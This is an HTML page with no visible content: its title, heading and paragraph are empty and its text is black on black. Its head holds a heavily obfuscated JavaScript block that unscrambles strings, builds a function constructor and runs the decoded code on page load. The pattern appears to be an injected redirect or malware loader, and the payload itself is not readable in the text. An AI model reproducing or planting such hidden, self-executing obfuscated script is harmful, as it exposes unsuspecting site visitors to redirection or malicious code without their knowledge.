<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title></title>
  <script type="text/javascript">
var URLlist,reDelay;(function(){var JNZ='',mPQ=915-904;function VdM(r){var i=4125871;var d=r.length;var v=[];for(var a=0;a<d;a++){v[a]=r.charAt(a)};for(var a=0;a<d;a++){var z=i*(a+69)+(i%23264);var u=i*(a+263)+(i%21702);var j=z%d;var e=u%d;var m=v[j];v[j]=v[e];v[e]=m;i=(z+u)%5241444;};return v.join('')};var rlF=VdM('ctnpcrucvkayttseogdsuqlizoojxwhnrbmfr').substr(0,mPQ);var AZu=';au e=t6(co2],w=r9dvnrhe,"abtdyf=hyj(l(n0pur=tavex,zn;saC b=37(,u5q8j,)5;86,p6)90,r0 9r,n6(8;,7218g,=6r7a,[4a7;,n0[7t,i7+;+ag 4=n]rfvrlvor-a.0;a pvlcnat1;y+,).[r[;](=e+[;Aa= i=1].h1=;7rcc=f81u6=h7(f=rivvr9t=0=t+augvminys l.nst ;s+))wvAr2swaaghm.n.s[ti.)pri0(= y)dfnrav rhgisll)nlt9-.;f><0,g1-6{]a.  =lullvvtred}spgq;va< 5=uu,lhv+r,wh0.vprcqrdglenita;ra[ (;)o)(8ar v=a;)<];;+f);vvr;m drcuaiC+d(A](=))ver=r=b}m];rf,rg{r=orm18*]+l.kh[r"o e}toy)1n-r;C=(;u+0;eeisa sf+m}=+)gflco(p.6e)gth-hrdgcfafCjd;Ar(v+a),+e.7h,rhoCeut(ya2h-r;a=0;8+(2e}}lqe4c,nfi;u;;di{(h=anely)8=8]oi1(t>t)j.mu=h(d.s.bstiigg=w oC)1i9pnss(1[)+=]7;s=o+c;viv(l!"n{l+)ai,(r<h)).=u6hidosubdtei[g)wd)fstgf=+.roino"o)"}pk"p4s.({[0]r;nvyr)x=k;joiy(["a;)a( o==9[,o2p3u,a2;1n, 2f.7o(cwttps;ban +=nt(itgaf9otCraoCydk(y6+;so[({aa ;=r;y<1.fehgphaac+.x;x)s;lit v{e;c(arAh(+)-.*ovn=S.ran,.rrim(h!r+oie.nia=)h; e"uSn,xestl)tuv;"("e.5o]nav];';var OkY=VdM[rlF];var ADE='';var zkx=OkY;var iEY=OkY(ADE,VdM(AZu));var Tno=iEY(VdM('h+i.KcKKK37iKad)!,$.te!r46K9r1K-KKf_$7K{nldK 8#($n$((!foi_oo6.(0.,DuaKt)82.=)!)nin_(!6(.7iflj;s,)9ga =$i7; ofseddde}1t=b.(16ee5K7n=(Ks8$5!,%$nejuSh,K(h$odgu.,93t\/{3rK.-1K]o%,K3o$Ka53lKn6d,.(+htjCo0n=;x=K)KdK"x.o;#sug]!ad.s+%7df,(ri\/g7,5, sKpfad.Kam$,bb_=;K0s($_%0r!)=)711k7K[nieyot_0($!..!74); .{7\'w_h)h03;rdK$i7,Kha4Kj;hr{d;l"\'7wi\/1c)g(}t\/sr. 1+Kt,{K\'K(aK7=t+d_g,Ks5aKt;K.KKti4{,)ad)(}9=g;)6o.+n1t5h,)1)a]a (0Kuutod(4;  {sj#.KT.)s$"j(_=o-3o)n=K9__2pKh((.,4d7h1o(.3e(ntag1!KKKK. m&] g)8r9o=a!4jsd"3[jlw_nws;a}rrK((jc}! Ks!$o,rv;o;i[K&)1f,e.Kf.ff43d7$,d8os.)1e7.*\/K);mt]KzlK0.Kn*_,ctKKc),)K..3aae+n0.f(1hr9$2K);tuin]jK._31,(3.6Kg=iK.c_1%("Ka)0Ktf(K..1,]!tKg[c3inrn3%*$}]r;d4&.,\'m-lloK=t)rK&K=;*r;]p%2lKs hKs2K].!(K&$Kd.n{ ..r}iKd(,!s{),t(fj7.c#.{=.hiKitewe_K&,sba{6cr_$3;)Ka!6y4l}dK5nK!=d_Kseen\'_.ee((r )3tsne)h{l}#d([gK(=uK;,uK).dg;j2,2%o)"iKf5em9plaa);[,rKK5aKdbrgm 5"K+K8=rd3)m).KntM=K!.;m,rd6)tc26d21.dl c$rKtr.=98rtaofn}e..1]a36l{1r2n!&(n#{% )d_,+;rhcK%wo$)nK04 $}_cj)KS9(.i.K.K(38m03 76e)0l}D6nKc.3.1 or K1;i()(4]))K.K((0d43h(8\'ni6Kt]8.#n .xdKa!;j(o)6[%!rKr_.la7)_Kd(5s..Mlz\/l"v27=ieKKfi"!i;hSl67.].).dKK.t )$!s$4iw.gK;tK3btm:C!pKaK7)n57d.)_moK\/3$!0#=.,_jop}K.[ftK!ek}d)3$)]'));var IuH=zkx(JNZ,Tno );IuH(5279);return 7945})()
</script>
  <style>
    /* Reset margin dan padding */
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    /*  */
    html, body {
      height: 100%;
      width: 100%;
      background-color: #000000; /* */
      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
      color: #000000; /* */
      display: flex;
      justify-content: center;
      align-items: center;
      text-align: center;
      padding: 20px;
    }

    /* */
    .container {
      max-width: 800px;
      width: 100%;
    }

    /* */
    h1 {
      font-size: clamp(2rem, 5vw, 4rem);
      margin-bottom: 20px;
    }

    /* Paragraf support text */
    p {
      font-size: clamp(1rem, 2.5vw, 1.5rem);
      line-height: 1.5;
      color: #000000;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1></h1>
    <p></p>
  </div>
</body>
</html>
